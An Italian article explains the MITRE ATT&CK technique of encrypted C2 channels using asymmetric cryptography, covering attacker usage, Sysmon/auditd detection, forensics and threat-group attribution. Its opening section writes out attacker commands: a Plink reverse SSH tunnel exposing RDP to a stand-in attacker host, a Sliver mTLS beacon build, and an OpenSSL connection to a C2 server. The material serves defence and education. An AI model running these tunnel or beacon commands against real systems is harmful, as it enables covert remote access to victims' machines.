Crittografia Asimmetrica nel C2: Encrypted Channel - Asymmetric Cryptography (T1573.002)

Per comprendere come gli attaccanti implementano questa tecnica, iniziamo generando una coppia di chiavi RSA. Su Linux, il comando base è:

openssl genrsa -out private.pem 2048 openssl rsa -in private.pem -pubout -out public.pem

Una volta ottenute le chiavi, possiamo creare un tunnel cifrato con Plink, lo stesso strumento usato dai gruppi FIN6 e Cobalt Group. Il comando per stabilire un tunnel SSH reverse è:

plink.exe -R 8443:localhost:3389 -l user -pw password attacker-server.com

Questo comando reindirizza il traffico RDP locale attraverso un tunnel SSH cifrato verso il server dell'attaccante. Per automatizzare il processo in PowerShell, come fa POWERSTATS, possiamo usare:

$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider(2048) $encrypted = $rsa.Encrypt([Text.Encoding]::UTF8.GetBytes($command), $false)

Gli attaccanti più sofisticati implementano certificati TLS personalizzati. Tool come Sliver e Mythic supportano nativamente mutual TLS, dove sia client che server verificano reciprocamente i certificati. La configurazione in Sliver richiede:

generate --mtls attacker.com --save beacon.exe

Per testare comunicazioni cifrate con OpenSSL direttamente:

openssl s_client -connect c2server.com:443 -cert client.crt -key client.key

Framework come Empire e Cobalt Strike offrono moduli pre-configurati per RSA. In Cobalt Strike, l'attivazione avviene modificando il profilo Malleable C2 con le direttive per HTTPS e certificati custom.

La detection di canali cifrati richiede un approccio comportamentale piuttosto che signature-based. I processi che caricano librerie crittografiche come rsaenh.dll o crypt32.dll su Windows meritano attenzione quando non sono browser o client email.

Su sistemi Windows, configurate Sysmon per catturare il caricamento di moduli crittografici. La regola Sysmon dovrebbe monitorare:

<RuleGroup name="" groupRelation="or">
  <ImageLoad onmatch="include">
    <ImageLoaded condition="contains any">rsaenh.dll;bcrypt.dll;ncrypt.dll</ImageLoaded>
  </ImageLoad>
</RuleGroup>

L'anomalia chiave sta nell'osservare processi inusuali che stabiliscono connessioni TLS. PowerShell.exe o cmd.exe che negoziano handshake SSL sono indicatori forti di attività sospetta.

Per Linux, auditd può tracciare le system call relative a operazioni crittografiche. Monitorate processi che invocano libcrypto o libssl al di fuori del normale:

auditctl -a always,exit -F arch=b64 -S socket,connect -F key=crypto_connections

La correlazione tra caricamento di librerie crypto e connessioni esterne è fondamentale. Un python script che carica OpenSSL e poi si connette a IP esterni non noti richiede investigazione immediata.

Gli indicatori di handshake anomali includono certificati self-signed, catene di certificazione incomplete, o handshake che falliscono ripetutamente prima di stabilire la connessione. GoldMax e Woody RAT mostrano proprio questi pattern durante la fase iniziale di connessione.

L'analisi forense di comunicazioni cifrate richiede l'identificazione degli artefatti lasciati durante la generazione e l'uso delle chiavi. Su Windows, verificate la presenza di chiavi RSA nel registry sotto:

HKEY_CURRENT_USER\Software\Microsoft\Cryptography\UserKeys

I file temporanei contenenti chiavi pubbliche spesso rimangono in %TEMP% o nelle directory di appdata dei malware. ComRAT lascia tracce di chiavi RSA usate per cifrare allegati email nel suo canale Gmail.

Per ricostruire la timeline, correlate i timestamp di generazione delle chiavi con l'inizio delle comunicazioni cifrate. I log di Event ID 5061 (operazioni crittografiche) forniscono timing precisi su Windows.

Su Linux, analizzate /var/log/secure per tracce di generazione chiavi SSH o operazioni OpenSSL. I malware come Penquin lasciano tracce dello scambio Diffie-Hellman nei log di sistema durante l'handshake iniziale.

La presenza di certificati TLS hardcoded nei binari è un indicatore forense prezioso. LITTLELAMB.WOOLTEA riutilizza chiavi private estratte da Ivanti Connect Secure, lasciando tracce identificabili nei memory dump.

Durante l'analisi di Operation Wocao, i forensic analyst hanno ricostruito l'intera catena di compromissione partendo dai socket TLS anomali creati dall'Agent proxy. La correlazione temporale tra perdita di accesso webshell e attivazione del canale cifrato ha permesso di mappare l'evoluzione tattica degli attaccanti.

APT41 rappresenta il caso di studio perfetto per l'evoluzione nell'uso della crittografia asimmetrica. Durante la campagna DUST (2023-2024), hanno standardizzato l'uso di HTTPS per tutti i tool, dimostrando una maturazione operativa significativa.

Il gruppo FIN6 mostra predilezione per tunnel SSH via Plink, pattern consistente attraverso multiple campagne. Questa preferenza tattica permette di attribuire con maggiore confidenza nuove intrusioni quando si osservano tunnel SSH reverse verso infrastrutture note.

RedEcho e il correlato TAG38 hanno dimostrato durante le intrusioni alle infrastrutture critiche indiane (2021-2022) un uso sistematico di SSL. L'targeting di utility elettriche e aziende logistiche suggerisce preparazione per operazioni di disruption, anche se non sono progrediti oltre la fase IT.

L'overlap di tool tra gruppi rivela possibili condivisioni o fornitori comuni. FIN8 e Cobalt Group utilizzano entrambi Plink, suggerendo accesso a playbook condivisi o possibile collaborazione nell'underground russo.

Volt Typhoon ha dimostrato capacità zero-day con l'exploit di Versa Director (CVE-2024-39717), usando HTTPS per mantenere l'accesso post-exploit. Il targeting di MSP e ISP indica strategia di supply chain compromise per accesso massivo a clienti downstream.

La geografia conta: gruppi cinesi come APT41 e RedEcho preferiscono tool custom con RSA hardcoded, mentre gruppi di lingua russa tendono verso tool pubblici modificati. Questa differenza aiuta nell'attribuzione iniziale durante le prime fasi di un'intrusione.

Tecnica documentata nel framework MITRE ATT&CK come T1573.002. Campagne Operation Wocao, C0021, APT41 DUST analizzate da Mandiant e CrowdStrike. Dettagli tecnici su implementazioni RSA in malware da reverse engineering reports di Kaspersky e ESET.